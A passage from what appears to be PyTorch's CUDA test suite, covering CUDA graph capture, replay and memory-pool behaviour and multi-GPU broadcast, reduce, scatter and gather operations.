getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
# Resets RNC states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
